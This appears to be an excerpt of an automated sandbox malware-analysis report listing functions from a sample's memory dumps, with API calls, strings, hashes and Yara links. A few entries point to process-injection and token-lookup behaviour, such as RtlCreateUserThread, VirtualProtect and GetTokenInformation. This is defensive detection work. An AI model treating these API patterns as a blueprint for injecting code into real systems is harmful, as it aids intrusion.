Opcode Fuzzy Hash: a7a29ed1146a2838a1a953b545c0c20c3df8c09792cabfb42726ced0f4b7ec54
Instruction Fuzzy Hash: 0751B13011CA0E4FEB9A9F9898917B536F0EF98350F540959D82ECF2E6DF74CA458782

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA336BE3 Relevance: 7.6, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA336C12

Part of subcall function 0000017DEA33A66F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33A69F
Part of subcall function 0000017DEA33A66F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33A6A9
Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A6DD
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6E8
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6F3

_snprintf.LIBCMT ref: 0000017DEA336C2A

Part of subcall function 0000017DEA33AA23: _errno.LIBCMT ref: 0000017DEA33AA5A
Part of subcall function 0000017DEA33AA23: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33AA65

free.LIBCMT ref: 0000017DEA336C41

Part of subcall function 0000017DEA33A62F: _errno.LIBCMT ref: 0000017DEA33A64F

malloc.LIBCMT ref: 0000017DEA336C91
_snprintf.LIBCMT ref: 0000017DEA336CA9
free.LIBCMT ref: 0000017DEA336CD1

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
String ID:
API String ID: 761449704-0
Opcode ID: 7769da5689e5036543463322d8dc2953687d35e842421fa7a79a909f037a7b7e
Instruction ID: b172d66971b5c1f0a27c95165a059c63c880cc70491e5c833341c0ad079a2e6e
Opcode Fuzzy Hash: 7769da5689e5036543463322d8dc2953687d35e842421fa7a79a909f037a7b7e
Instruction Fuzzy Hash: 7A41BA3070CA4D0FE66AA76C78113F577F2EBC9310F544299D09EC72A7DE249D568782

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73C5CC Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA73C604

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73C60F
_flush.LIBCMT ref: 0000017DEA73C6C1
_fileno.LIBCMT ref: 0000017DEA73C6E2
_flsbuf.LIBCMT ref: 0000017DEA73C725

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1640621425-0
Opcode ID: f89985f424ce9c22c43889eabc5058f2aa413770285343a9214468ff08af004a
Instruction ID: 18a1a79c437ed1512849d314a9189bf6f16a255cd1522e4fce72c98f5deac440
Opcode Fuzzy Hash: f89985f424ce9c22c43889eabc5058f2aa413770285343a9214468ff08af004a
Instruction Fuzzy Hash: 7141E73130825A86FA27FA2375543B9AAB1BF84FE0F2941309EDD4F6C1DE74C65D8242

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7254F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA72553A

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

malloc.LIBCMT ref: 0000017DEA725545

Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B2BC
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2C1

free.LIBCMT ref: 0000017DEA72562C
free.LIBCMT ref: 0000017DEA725634
free.LIBCMT ref: 0000017DEA725640
free.LIBCMT ref: 0000017DEA72564D

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: ad7a18b5cb1adff7d6ed1ba8d34c42f9090e139c4094cc48844a1b376a1b96a1
Instruction ID: cc4bf4e7ef11f1573033ff2ade7836657ddacb0366857e5347ab183e148b968b
Opcode Fuzzy Hash: ad7a18b5cb1adff7d6ed1ba8d34c42f9090e139c4094cc48844a1b376a1b96a1
Instruction Fuzzy Hash: 3A41D57121828A56EA17EB2678103B96BB4BBD5FC8F454030DD8D8F751EE38CA0AC312

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA746A44 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000017DEA746AA6
_isleadbyte_l.LIBCMT ref: 0000017DEA746AD6
MultiByteToWideChar.KERNEL32 ref: 0000017DEA746B15
MultiByteToWideChar.KERNEL32 ref: 0000017DEA746B63
_errno.LIBCMT ref: 0000017DEA746B6D

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: acbc039f2ec1fa7f9a161c65c4e844387fcccdc5e67f3ee5a67b1b2bba6280d5
Instruction ID: 8a6886dd7e82136367c712eb1c397daa15e42be4faac9707b290634e900d027e
Opcode Fuzzy Hash: acbc039f2ec1fa7f9a161c65c4e844387fcccdc5e67f3ee5a67b1b2bba6280d5
Instruction Fuzzy Hash: B741803120C78786E762DF15A5803BA7AB5EB84F80F288175EAC95BB95DF34CA41C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA32EC57 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA32EC78

Part of subcall function 0000017DEA33A66F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33A69F
Part of subcall function 0000017DEA33A66F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33A6A9
Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A6DD
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6E8
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6F3

free.LIBCMT ref: 0000017DEA32ECB3
fwrite.LIBCMT ref: 0000017DEA32ECF4
fclose.LIBCMT ref: 0000017DEA32ECFC
free.LIBCMT ref: 0000017DEA32ED09

Part of subcall function 0000017DEA33A62F: _errno.LIBCMT ref: 0000017DEA33A64F

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$free$_callnewhfclosefwritemalloc
String ID:
API String ID: 1696598829-0
Opcode ID: d33f83733c51049a4a4ade9dbf2abdbacb1bb332e5f6c2cf96a65aab921b9820
Instruction ID: d3fe4d979d7f0eb106b11e6ac194478a84a9cf67b30ff8b2b399cc78032bb422
Opcode Fuzzy Hash: d33f83733c51049a4a4ade9dbf2abdbacb1bb332e5f6c2cf96a65aab921b9820
Instruction Fuzzy Hash: 9121513061CA0E4BE696A7ACA0553F9B6F1FFD8700F50051DA45EC72D6ED389A058383

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72D0D8 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 0000017DEA72D168

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bcda17cac5d93cdb5fe913a43640c64a51e0ba4b6faa5eba64cdacd32ab3e5c5
Instruction ID: c7c9cc6bf80e01eef2d0d542e08bb080b39a064356d4fa4b37c03f9d37f988ee
Opcode Fuzzy Hash: bcda17cac5d93cdb5fe913a43640c64a51e0ba4b6faa5eba64cdacd32ab3e5c5
Instruction Fuzzy Hash: 25319E70A0C65B86FB67FB21B8503FA22B1AFC4790F554031D9CD0FAD2CF288B458262

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73795C Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 0000017DEA7379A9
HeapDestroy.KERNEL32 ref: 0000017DEA7379D6
VirtualFree.KERNEL32 ref: 0000017DEA7379E9
VirtualFree.KERNEL32 ref: 0000017DEA737A00
UnmapViewOfFile.KERNEL32 ref: 0000017DEA737A15

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Virtual$Free$DestroyFileHeapQueryUnmapView
String ID:
API String ID: 4268163748-0
Opcode ID: ecd707e202f996ff919fcabb4e169c036be23c3c50405656e62834dcfc0e3079
Instruction ID: 27687f72c9c7df50a6fd37ea60abc0f6e9fe06bfe78887400d1f80c83ab847cc
Opcode Fuzzy Hash: ecd707e202f996ff919fcabb4e169c036be23c3c50405656e62834dcfc0e3079
Instruction Fuzzy Hash: 9F21443160860B81FA73EB19B4503FA66B0BFC5B90F694530D9CD5A694DF29CB498B02

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA3457DF Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA3457F0

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

__doserrno.LIBCMT ref: 0000017DEA3457E8

Part of subcall function 0000017DEA33CDE7: _getptd_noexit.LIBCMT ref: 0000017DEA33CDEB

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
Instruction ID: 5aa080da97ae470a3ffadb15c68f84cdf355af109689a1168d38e7079fb172b2
Opcode Fuzzy Hash: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
Instruction Fuzzy Hash: 8901D63062C94F4EE257A7A498513F836B0EFA1326F554354E02ECE0F2DF385944C213

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA746398 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA7463A9

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

__doserrno.LIBCMT ref: 0000017DEA7463A1

Part of subcall function 0000017DEA73D9A0: _getptd_noexit.LIBCMT ref: 0000017DEA73D9A4

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
Instruction ID: f6ef4eb6cc61b7e40bf4b3fc6a58e8b386505b9c598f92b50c99349fa912cf30
Opcode Fuzzy Hash: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
Instruction Fuzzy Hash: 8F014F7261C68A85EA07BB14E9813FD26709FD0B71FA247A1D5AE0A2D3CB2846558623

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72D580 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

Strings

%s!%s, xrefs: 0000017DEA72D72F

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID:
String ID: %s!%s
API String ID: 0-2935588013
Opcode ID: d1dd4778a69ad9038696b18b5a84f60a207cd73a732bd85dd988b4e8d9e72639
Instruction ID: 87ad6562d8e37c308c0553fba318e42d31f028e2d19380d0fee9005fa136534d
Opcode Fuzzy Hash: d1dd4778a69ad9038696b18b5a84f60a207cd73a732bd85dd988b4e8d9e72639
Instruction Fuzzy Hash: 605165B520864686EA65EF11E0106FA73B1FFC8B94F5581329ECE4B786DF38C641C716

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73AA24 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 0000017DEA73AAB9
LookupAccountSidA.ADVAPI32 ref: 0000017DEA73AAFE
_snprintf.LIBCMT ref: 0000017DEA73AB26

Strings

%s\%s, xrefs: 0000017DEA73AB14

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AccountInformationLookupToken_snprintf
String ID: %s\%s
API String ID: 2107350476-4073750446
Opcode ID: e8f535f0c498490c4bdc1e4690b3115688fadedd2f6129859e505a1612886452
Instruction ID: 59041e4d85c9416f00044057f9c782fb75e103babbab403deedf65067d3201d9
Opcode Fuzzy Hash: e8f535f0c498490c4bdc1e4690b3115688fadedd2f6129859e505a1612886452
Instruction Fuzzy Hash: 64316F32208B8695E722DF21E8042EA6774F7C8B88F944125EACC5BB59DF39C309C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73B800 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA73B851

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73B85C

Strings

x86, xrefs: 0000017DEA73B827
B, xrefs: 0000017DEA73B888

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B$x86
API String ID: 1812809483-1233573079
Opcode ID: d81cd18daed7324077352a26b73286590cea42c1c2305b4db55e814308682461
Instruction ID: a17df711438c6a108ddae037111ffabb45c4d6364263b32265ff6e380a0f24b0
Opcode Fuzzy Hash: d81cd18daed7324077352a26b73286590cea42c1c2305b4db55e814308682461
Instruction Fuzzy Hash: 1E117072618A4485EB12EB12E4403E97670FBD8BE4F658320AB9C0BB95CF38C648CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA732B28 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017DEA732B52
GetProcAddress.KERNEL32 ref: 0000017DEA732B62

Strings

RtlCreateUserThread, xrefs: 0000017DEA732B58
ntdll.dll, xrefs: 0000017DEA732B3F

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlCreateUserThread$ntdll.dll
API String ID: 1646373207-2935400652
Opcode ID: 3f3881e51e27e694dbcc5c375b5778905f07784a660b123b8c5191d829aaba4f
Instruction ID: 8c4e90c3327329130898a816c1dd5123efe8b072566f95c31f46eadbdd84ad4a
Opcode Fuzzy Hash: 3f3881e51e27e694dbcc5c375b5778905f07784a660b123b8c5191d829aaba4f
Instruction Fuzzy Hash: 47112A32218B8582EB11DF51F88059977B8FB98BD0F998135EADD47B14DF38C595C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72FF18 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017DEA72FF2D
GetProcAddress.KERNEL32 ref: 0000017DEA72FF3D

Strings

kernel32, xrefs: 0000017DEA72FF26
IsWow64Process, xrefs: 0000017DEA72FF33

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: 731a3f4a3180ed4b639956c0023b506e8e51e63c1903fd8a6137ade375b55eae
Instruction ID: 79f89cac686d99987c26ab224918ff09b41d5036a0591e2ed07039b8ef5773ec
Opcode Fuzzy Hash: 731a3f4a3180ed4b639956c0023b506e8e51e63c1903fd8a6137ade375b55eae
Instruction Fuzzy Hash: 7CE09A7132860B82EE46EB15F8903F423B0EFC57E1F481030E99E0A260EE28C398CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA731350 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017DEA731360
GetProcAddress.KERNEL32 ref: 0000017DEA731370

Strings

kernel32, xrefs: 0000017DEA731359
Wow64DisableWow64FsRedirection, xrefs: 0000017DEA731366

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 1646373207-736604160
Opcode ID: fbbcf69949dc4a765985351bea2d0c18cfeb49881c2d8615ffc084255ee576bd
Instruction ID: bb956372b7a9e3e3887da3703efba743a632e8e3e990a5d2d3adc694840120c1
Opcode Fuzzy Hash: fbbcf69949dc4a765985351bea2d0c18cfeb49881c2d8615ffc084255ee576bd
Instruction Fuzzy Hash: F0D0173071560B82EE0BEB91B8442F42370AFC8BE0F481431889E0E760DE2882898301

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA731388 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017DEA731398
GetProcAddress.KERNEL32 ref: 0000017DEA7313A8

Strings

kernel32, xrefs: 0000017DEA731391
Wow64RevertWow64FsRedirection, xrefs: 0000017DEA73139E

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 1646373207-3900151262
Opcode ID: 667aabc9b9536ce3034975af6a8499c6cf0a73ba4ecc93c21e81ad6850c911ed
Instruction ID: 5045cba15fe4e444d769f39b7827bd654ee3c9493538179e30f3c8284ae9aa14
Opcode Fuzzy Hash: 667aabc9b9536ce3034975af6a8499c6cf0a73ba4ecc93c21e81ad6850c911ed
Instruction Fuzzy Hash: C8D0123071560B81EE07FB51B8442F42370AFC57A0F481530885D0E360DD2882498301

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33A52B Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA33A54E

Part of subcall function 0000017DEA33A66F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33A69F
Part of subcall function 0000017DEA33A66F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33A6A9
Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A6DD
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6E8
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6F3

malloc.LIBCMT ref: 0000017DEA33A55C

Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A703
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A708

